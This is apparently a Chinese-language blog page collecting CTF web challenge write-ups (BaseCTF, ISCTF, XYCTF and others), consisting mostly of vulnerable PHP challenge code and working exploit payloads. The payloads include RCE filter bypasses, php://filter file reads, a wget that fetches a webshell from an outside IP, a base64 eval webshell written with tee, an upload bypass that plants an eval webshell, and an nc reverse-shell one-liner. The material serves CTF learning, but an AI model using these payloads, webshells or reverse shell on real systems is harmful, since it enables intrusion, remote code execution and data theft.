<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">res = requests.post(&quot;http://101.37.149.223:32943/index.php?e[m.p=114514.1&amp;a=SplFileObject&amp;b=php://filter/read=convert.base64-encode/resource=flag.php&amp;c=__toString&quot;,data = &#123;&quot;try&quot;:&quot;-&quot;*1000001+&quot;HACKER&quot;&#125;)</span><br><span class="line">print(res.text)</span><br></pre></td></tr></table></figure>

<h2 id="11-Basectf-玩原神玩的"><a href="#11-Basectf-玩原神玩的" class="headerlink" title="11.Basectf  玩原神玩的"></a>11.Basectf  玩原神玩的</h2><p>第一层：判断传的数组是否和array数组大小相等，爆破大小绕过</p>
<p>第二层：传入 我要玩原神 即可</p>
<p>第三层：传入m数组，其中m[0]是字符串100%，m[1]是字符串love100%拼接m[0]的md5值。%要url编码</p>
<p>第四层：将给定的md5数组与当前索引异或，得到flag</p>
<p>python脚本:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import hashlib</span><br><span class="line"></span><br><span class="line">url=&#x27;http://challenge.basectf.fun:46462/?tip=我要玩原神&#x27;</span><br><span class="line">payload=&#x27;&#x27;</span><br><span class="line">for i in range(45):</span><br><span class="line"> payload+=&#x27;len[&#x27;+str(i)+&#x27;]=0&amp;&#x27;</span><br><span class="line"># print(payload)</span><br><span class="line">header=&#123;&#x27;Content-Type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;&#125;</span><br><span class="line">payload+=&#x27;m[0]=100%25&amp;m[1]=love100%2530bd7ce7de206924302499f197c7a966&#x27;</span><br><span class="line"># %需要编码</span><br><span class="line"></span><br><span class="line">res=requests.post(url=url,data=payload,headers=header)</span><br><span class="line">print(res.text)</span><br><span class="line">#得到flag与索引异或的md5值</span><br><span class="line"></span><br><span class="line">flag_enc=[&quot;3295c76acbf4caaed33c36b1b5fc2cb1&quot;,&quot;26657d5ff9020d2abefe558796b99584&quot;,&quot;73278a4a86960eeb576a8fd4c9ec6997&quot;,&quot;ec8956637a99787bd197eacd77acce5e&quot;,&quot;e2c420d928d4bf8ce0ff2ec19b371514&quot;,&quot;43ec517d68b6edd3015b3edc9a11367b&quot;,&quot;ea5d2f1c4608232e07d3aa3d998e5135&quot;,&quot;c8ffe9a587b126f152ed3d89a146b445&quot;,&quot;072b030ba126b2f4b2374f342be9ed44&quot;,&quot;093f65e080a295f8076b1c5722a46aa2&quot;,&quot;a3c65c2974270fd093ee8a9bf8ae7d0b&quot;,&quot;2723d092b63885e0d7c260cc007e8b9d&quot;,&quot;72b32a1f754ba1c09b3695e0cb6cde7f&quot;,&quot;072b030ba126b2f4b2374f342be9ed44&quot;,&quot;698d51a19d8a121ce581499d7b701668&quot;,&quot;72b32a1f754ba1c09b3695e0cb6cde7f&quot;,&quot;7f39f8317fbdb1988ef4c628eba02591&quot;,&quot;a5771bce93e200c36f7cd9dfd0e5deaa&quot;,&quot;a5bfc9e07964f8dddeb95fc584cd965d&quot;,&quot;a5bfc9e07964f8dddeb95fc584cd965d&quot;,&quot;f7177163c833dff4b38fc8d2872f1ec6&quot;,&quot;9f61408e3afb633e50cdf1b20de6f466&quot;,&quot;e369853df766fa44e1ed0ff613f563bd&quot;,&quot;73278a4a86960eeb576a8fd4c9ec6997&quot;,&quot;182be0c5cdcd5072bb1864cdee4d3d6e&quot;,&quot;da4fb5c6e93e74d3df8527599fa62642&quot;,&quot;b53b3a3d6ab90ce0268229151c9bde11&quot;,&quot;4c56ff4ce4aaf9573aa5dff913df997a&quot;,&quot;f7177163c833dff4b38fc8d2872f1ec6&quot;,&quot;ec5decca5ed3d6b8079e2e7e7bacc9f2&quot;,&quot;d9d4f495e875a2e075a1a4a6e1b9770f&quot;,&quot;c0c7c76d30bd3dcaefc96f40275bdc0a&quot;,&quot;3295c76acbf4caaed33c36b1b5fc2cb1&quot;,&quot;ea5d2f1c4608232e07d3aa3d998e5135&quot;,&quot;735b90b4568125ed6c3f678819b6e058&quot;,&quot;7cbbc409ec990f19c78c75bd1e06f215&quot;,&quot;3295c76acbf4caaed33c36b1b5fc2cb1&quot;,&quot;e2c420d928d4bf8ce0ff2ec19b371514&quot;,&quot;70efdf2ec9b086079795c442636b55fb&quot;,&quot;c16a5320fa475530d9583c34fd356ef5&quot;,&quot;6ea9ab1baa0efb9e19094440c317e21b&quot;,&quot;02e74f10e0327ad868d138f2b4fdd6f0&quot;,&quot;d1fe173d08e959397adf34b1d77e88d7&quot;,&quot;34173cb38f07f89ddbebc2ac9128303f&quot;,&quot;43ec517d68b6edd3015b3edc9a11367b&quot;]</span><br><span class="line"></span><br><span class="line">flag=&#x27;&#x27;</span><br><span class="line">for i in range(45):</span><br><span class="line">    for j in range(126):</span><br><span class="line">        if((hashlib.md5(str(j^i).encode(&#x27;utf-8&#x27;))).hexdigest()==flag_enc[i]):</span><br><span class="line">            flag+=chr(j)</span><br><span class="line"></span><br><span class="line">print(flag)</span><br><span class="line"># BaseCTF&#123;42ff51a6-7768-4f9a-b0b0-baaefb7852e5&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="ISCTF-ezrce"><a href="#ISCTF-ezrce" class="headerlink" title="ISCTF ezrce"></a>ISCTF ezrce</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#x27;cmd&#x27;])) &#123;</span><br><span class="line">    $cmd = $_GET[&#x27;cmd&#x27;];</span><br><span class="line"></span><br><span class="line">    if (preg_match(&quot;/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&amp;\&gt;\&lt;]|eval|system|exec|popen|shell_exec/i&quot;, $cmd)) &#123;</span><br><span class="line">        die(&quot;Blocked by security filter!&quot;);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        eval($cmd);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>利用无数字字母 rce 之取反，即可绕过。脚本如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$system=&#x27;system&#x27;;</span><br><span class="line">$command=&#x27;cat /flag&#x27;;</span><br><span class="line">echo &#x27;(~&#x27;.urlencode(~$system).&#x27;)(~&#x27;.urlencode(~$command).&#x27;);&#x27;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>payload 如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);</span><br><span class="line">或者</span><br><span class="line">?cmd=include$_GET[1];&amp;1=php://filter/convert.base64-encode/resource=/flag</span><br></pre></td></tr></table></figure>



<h2 id="ISCTF-千年樱"><a href="#ISCTF-千年樱" class="headerlink" title="ISCTF  千年樱"></a>ISCTF  千年樱</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;dir.php&quot;;</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">function waf($str)&#123;</span><br><span class="line">    if(preg_match(&quot;/http|php|file|:|=|\/|\?/i&quot;, $str) )&#123;</span><br><span class="line">        die(&#x27;bad hacker!!!&#x27;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$poc = $_POST[&#x27;poc&#x27;];</span><br><span class="line">waf($poc);</span><br><span class="line">$filename = &quot;php://filter/$poc/resource=/var/www/html/badChar.txt&quot;;</span><br><span class="line">$result = file_get_contents($filename);</span><br><span class="line">if($result === &quot;sakura for ISCTF&quot;)&#123;</span><br><span class="line">    echo &quot;yes! master!&quot;;</span><br><span class="line">    eval($_POST[&#x27;cmd&#x27;]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if($_GET[&#x27;output&#x27;] == 114514 &amp;&amp; !is_numeric($_GET[&#x27;output&#x27;]))&#123;</span><br><span class="line">    var_dump($result);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>1.代码审计需要伪造badchar.txt里的数据为sakura for ISCTF</p>
<p>2.使用工具 php_filter_chain 进行伪造，工具地址如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/synacktiv/php_filter_chain_generatorhttps://github.com/synacktiv/php_filter_chain_generator</span><br></pre></td></tr></table></figure>

<p>3.生成命令如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python php_filter_chain_generator.py --chain &quot;sakura for ISCTF&lt;?php&quot;</span><br></pre></td></tr></table></figure>

<p>按照文章所说，直接打的话后面会有脏数据，手动加 string.strip_tags 过滤器来去除php标签</p>
<p>按照要求传参绕过，然后正常命令执行得到 flag</p>
<h2 id="禁用-b-h-m-r"><a href="#禁用-b-h-m-r" class="headerlink" title="禁用[b-h]|[m-r]"></a>禁用<code>[b-h]|[m-r]</code></h2><p>可用?emo&#x3D;tail%09??a?.txt</p>
<h2 id="数字白名单"><a href="#数字白名单" class="headerlink" title="数字白名单"></a>数字白名单</h2><p>构造八进制命令执行</p>
<p><a target="_blank" rel="noopener" href="https://config.net.cn/tools/TextToBit8.html">在线字符串转八进制</a></p>
<p>注意第一个字符前面也要加\</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=$0&lt;&lt;&lt;$&#x27;八进制值&#x27;</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=$0&lt;&lt;&lt;$%27\143\141\164\040\057\146\154\141\147%27</span><br></pre></td></tr></table></figure>

<h2 id="XYCTF牢牢记住，逝者为大"><a href="#XYCTF牢牢记住，逝者为大" class="headerlink" title="XYCTF牢牢记住，逝者为大"></a>XYCTF牢牢记住，逝者为大</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">function Kobe($cmd)</span><br><span class="line">&#123;</span><br><span class="line">    if (strlen($cmd) &gt; 13) &#123;</span><br><span class="line">        die(&quot;see you again~&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if (preg_match(&quot;/echo|exec|eval|system|fputs|\.|\/|\\|/i&quot;, $cmd)) &#123;</span><br><span class="line">        die(&quot;肘死你&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    foreach ($_GET as $val_name =&gt; $val_val) &#123;</span><br><span class="line">        if (preg_match(&quot;/bin|mv|cp|ls|\||f|a|l|\?|\*|\&gt;/i&quot;, $val_val)) &#123;</span><br><span class="line">            return &quot;what can i say&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    return $cmd;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$cmd = Kobe($_GET[&#x27;cmd&#x27;]);</span><br><span class="line">echo &quot;#man,&quot; . $cmd  . &quot;,manba out&quot;;</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">eval(&quot;#man,&quot; . $cmd . &quot;,mamba out&quot;);</span><br></pre></td></tr></table></figure>

<p>1.为了命令执行，我们需要做的就是换行和注释掉mamba out</p>
<p>2.关于命令执行，因为限长，所以考虑用<code>$_GET[1]</code>来转接</p>
<p>3.但对GET有诸多限制，连curl都打不了，考虑写马</p>
<p>写马有两种方式，一种echo &gt;，另一种直接wget下载远程文件，本题显然是后者</p>
<p>4.payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=%0a`$_GET[1]`;%23&amp;1=wget 124.222.136.33:1337/yjh.php</span><br></pre></td></tr></table></figure>

<p>%0a换行,%23注释</p>
<p>成功写马，命令执行拿到flag</p>
<h2 id="利用花括号或正则匹配绕过"><a href="#利用花括号或正则匹配绕过" class="headerlink" title="利用花括号或正则匹配绕过"></a>利用花括号或正则匹配绕过</h2><p>ISCTF2023fuzz!</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/*</span><br><span class="line">Read /flaggggggg.txt</span><br><span class="line">Hint: 你需要学会fuzz，看着键盘一个一个对是没有灵魂的</span><br><span class="line">知识补充：curl命令也可以用来读取文件哦，如curl file:///etc/passwd</span><br><span class="line">*/</span><br><span class="line">error_reporting(0);</span><br><span class="line">header(&#x27;Content-Type: text/html; charset=utf-8&#x27;);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$file = &#x27;file:///etc/passwd&#x27;;</span><br><span class="line">if(preg_match(&quot;/\`|\~|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\+|\=|\\\\|\&#x27;|\&quot;|\;|\&lt;|\&gt;|\,|\?|jay/i&quot;, $_GET[&#x27;file&#x27;]))&#123;</span><br><span class="line">    die(&#x27;你需要fuzz一下哦~&#x27;);</span><br><span class="line">&#125;</span><br><span class="line">if(!preg_match(&quot;/fi|le|flag/i&quot;, $_GET[&#x27;file&#x27;]))&#123;</span><br><span class="line">    $file = $_GET[&#x27;file&#x27;];</span><br><span class="line">&#125;</span><br><span class="line">system(&#x27;curl &#x27;.$file);</span><br></pre></td></tr></table></figure>

<p><strong>这里过滤禁用了一大堆的符号，但是<code>&#39;&#123;&#39;</code>,<code>&#39;&#125;&#39;</code>,<code>&#39;[&#39;</code>,<code>&#39;]&#39;</code>没有被过滤禁用</strong></p>
<p><strong>这里对我们的<code>file</code>做了处理，而且还过滤了flag</strong></p>
<p><strong>现在来构造我们的payload：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=&#123;f&#125;i&#123;l&#125;e:///fl&#123;a&#125;ggggggg.txt</span><br></pre></td></tr></table></figure>

<p><strong><code>file:///</code> 表示指向本地文件系统的根目录。在使用这个 URL Scheme 时，通常会在 <code>file:///</code> 后面添加文件的路径来指定要访问的文件。例如，<code>file:///path/to/file.txt</code> 表示指向文件系统中 <code>/path/to/file.txt</code> 这个文件的路径</strong></p>
<p><strong>或者正则匹配绕过：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=f[i-i]l[e-e]:///fl[a-a]ggggggg.txt</span><br></pre></td></tr></table></figure>

<p>或者</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=http://www.baidu.dom|echo PD9waHAgZXZhbCgkX1BPU1RbMTExXSk7|base64 -d | tee 1.php</span><br></pre></td></tr></table></figure>

<p>访问1.php后执行命令</p>
<h2 id="BaseCTF-ez-php-jail"><a href="#BaseCTF-ez-php-jail" class="headerlink" title="BaseCTF_ez_php_jail"></a>BaseCTF_ez_php_jail</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">error_reporting(0);</span><br><span class="line">include(&quot;hint.html&quot;);</span><br><span class="line">$Jail = $_GET[&#x27;Jail_by.Happy&#x27;];</span><br><span class="line"></span><br><span class="line">if($Jail == null) die(&quot;Do You Like My Jail?&quot;);</span><br><span class="line"></span><br><span class="line">function Like_Jail($var) &#123;</span><br><span class="line">    if (preg_match(&#x27;/(`|\$|a|c|s|require|include)/i&#x27;, $var)) &#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (Like_Jail($Jail)) &#123;</span><br><span class="line">    eval($Jail);</span><br><span class="line">    echo &quot;Yes! you escaped from the jail! LOL!&quot;;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    echo &quot;You will Jail in your life!&quot;;</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;\n&quot;;</span><br></pre></td></tr></table></figure>

<p>1.首先先看提交的参数，<code>Jail_by.Happy</code>，这个不是一个合法的参数，所以需要对其合理化,将前面的 _ 替换为[即可</p>
<p>2.这个就是一个rce，但是这里禁用了很多的东西，可以通过提交 phpinfo(); 来查看信息</p>
<p>3.这里还禁用了许多的字母和字符，我们就可以通过使用<strong>php内置函数</strong>来进行绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?Jail[by.Happy=print_r(glob(&#x27;/f*&#x27;));</span><br><span class="line">?Jail[by.Happy=print_r(implode(glob(&#x27;/f*&#x27;)));//这里来读取数组里面的内容</span><br><span class="line">?Jail[by.Happy=highlight_file(implode(glob(&#x27;/f*&#x27;)));</span><br><span class="line">?Jail[by.Happy=highlight_file(glob(&#x27;/f*&#x27;)[0]);</span><br></pre></td></tr></table></figure>

<h2 id="LitCTF-2024-百万美元的诱惑"><a href="#LitCTF-2024-百万美元的诱惑" class="headerlink" title="[LitCTF 2024]百万美元的诱惑"></a>[LitCTF 2024]百万美元的诱惑</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//flag in 12.php</span><br><span class="line">error_reporting(0);</span><br><span class="line">if(isset($_GET[&#x27;x&#x27;]))&#123;</span><br><span class="line">    $x = $_GET[&#x27;x&#x27;];</span><br><span class="line">    if(!preg_match(&quot;/[a-z0-9;`|#&#x27;\&quot;%&amp;\x09\x0a&gt;&lt;.,?*\-=\\[\]]/i&quot;, $x))&#123;</span><br><span class="line">            system(&quot;cat &quot;.$x.&quot;.php&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>能过滤的都过滤了,这里用$(())来进行构造（代表0）</p>
<p>使用二进制取反如果正数的话1取反为0</p>
<p>正数取反为本身加1的负数</p>
<p>负数取反为其本身加1的绝对值，0取反为-1，-1取反为0</p>
<p>脚本如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">get_reverse_number = &quot;$((~$((&#123;&#125;))))&quot; # 取反操作</span><br><span class="line">negative_one = &quot;$((~$(())))&quot;    # -1</span><br><span class="line">payload = get_reverse_number.format(negative_one*13)</span><br><span class="line">print(payload)</span><br></pre></td></tr></table></figure>

<h2 id="SWPUCTF-2024-秋季新生赛-未选择的路"><a href="#SWPUCTF-2024-秋季新生赛-未选择的路" class="headerlink" title="[SWPUCTF 2024 秋季新生赛]未选择的路"></a>[SWPUCTF 2024 秋季新生赛]未选择的路</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//一片森林里分出两条路————而我选择了人迹更少的一条，从此决定了我一生的道路。</span><br><span class="line">Include(&#x27;check.php&#x27;);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line">$A=$_GET[&#x27;easy&#x27;];</span><br><span class="line">$B=$_GET[&#x27;hard&#x27;];</span><br><span class="line"></span><br><span class="line">if (isset($A))&#123;</span><br><span class="line">eval(&#x27;e&#x27;.&#x27;x&#x27;.&#x27;i&#x27;.&#x27;t&#x27;.&#x27;(); ?&gt;&#x27;.$A.&#x27;&lt;?php ;&#x27;);//这条路没有任何过滤诶，是不是好走一些</span><br><span class="line">&#125;</span><br><span class="line">if (isset($B))&#123;</span><br><span class="line">check($B);//要被正则了，嘤嘤嘤</span><br><span class="line">eval(&quot;#cmd&quot;.$B.&quot;inject&quot;);//这条路怎么还要禁我东西啊，真下头</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>1.读下代码，输个hard&#x3D;system试一下咯。</p>
<p>2.返回提示说passthru和system都禁⽤了，但是其他都能⽤，用反引号加?&gt;闭合的方法哈,payload这样写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?hard=?&gt;&lt;?php echo `ls`;?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="GHCTF-2024-PermissionDenied"><a href="#GHCTF-2024-PermissionDenied" class="headerlink" title="[GHCTF 2024]PermissionDenied"></a>[GHCTF 2024]PermissionDenied</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"> </span><br><span class="line">function blacklist($file)&#123;</span><br><span class="line">    $deny_ext = array(&quot;php&quot;,&quot;php5&quot;,&quot;php4&quot;,&quot;php3&quot;,&quot;php2&quot;,&quot;php1&quot;,&quot;html&quot;,&quot;htm&quot;,&quot;phtml&quot;,&quot;pht&quot;,&quot;pHp&quot;,&quot;pHp5&quot;,&quot;pHp4&quot;,&quot;pHp3&quot;,&quot;pHp2&quot;,&quot;pHp1&quot;,&quot;Html&quot;,&quot;Htm&quot;,&quot;pHtml&quot;,&quot;jsp&quot;,&quot;jspa&quot;,&quot;jspx&quot;,&quot;jsw&quot;,&quot;jsv&quot;,&quot;jspf&quot;,&quot;jtml&quot;,&quot;jSp&quot;,&quot;jSpx&quot;,&quot;jSpa&quot;,&quot;jSw&quot;,&quot;jSv&quot;,&quot;jSpf&quot;,&quot;jHtml&quot;,&quot;asp&quot;,&quot;aspx&quot;,&quot;asa&quot;,&quot;asax&quot;,&quot;ascx&quot;,&quot;ashx&quot;,&quot;asmx&quot;,&quot;cer&quot;,&quot;aSp&quot;,&quot;aSpx&quot;,&quot;aSa&quot;,&quot;aSax&quot;,&quot;aScx&quot;,&quot;aShx&quot;,&quot;aSmx&quot;,&quot;cEr&quot;,&quot;sWf&quot;,&quot;swf&quot;,&quot;ini&quot;);</span><br><span class="line">    $ext = pathinfo($file, PATHINFO_EXTENSION);</span><br><span class="line">    foreach ($deny_ext as $value) &#123;</span><br><span class="line">        if (stristr($ext, $value))&#123;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_FILES[&#x27;file&#x27;]))&#123;</span><br><span class="line">    $filename = urldecode($_FILES[&#x27;file&#x27;][&#x27;name&#x27;]);</span><br><span class="line">    $filecontent = file_get_contents($_FILES[&#x27;file&#x27;][&#x27;tmp_name&#x27;]);</span><br><span class="line">    if(blacklist($filename))&#123;</span><br><span class="line">        file_put_contents($filename, $filecontent);</span><br><span class="line">        echo &quot;Success!!!&quot;;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;Hacker!!!&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>file_put_content函数有一个文件解析的漏洞</p>
<p><code>当上传</code>123.php&#x2F;.<code>的时候，file_put_contents函数会认为是要在123.php文件所在的目录下创建一个名为</code>.<code>的文件，最终上传创建的是123.php</code></p>
<p>1.123.php内容:<?php eval($_POST[0]);phpinfo();?></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &quot;http://node6.anna.nssctf.cn:22921/&quot;</span><br><span class="line">file = &#123;</span><br><span class="line">    &quot;file&quot;:(&quot;123.php%2f.&quot;,open(&#x27;1.php&#x27;,&#x27;r&#x27;))</span><br><span class="line">&#125;</span><br><span class="line">res = requests.post(url=url,files=file).text</span><br><span class="line">print(res)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>2.蚁剑连接进去以后，可以发现无法执行命令</p>
<p>3.查看phpinfo信息，发现命令执行函数被禁用了</p>
<p>4.那我们只能使用蚁剑的插件了:UserFilter</p>
<p>5.成功命令执行，那我们就反弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc xxx.xxx.xxx.xxx 8989 &gt;/tmp/f</span><br></pre></td></tr></table></figure>


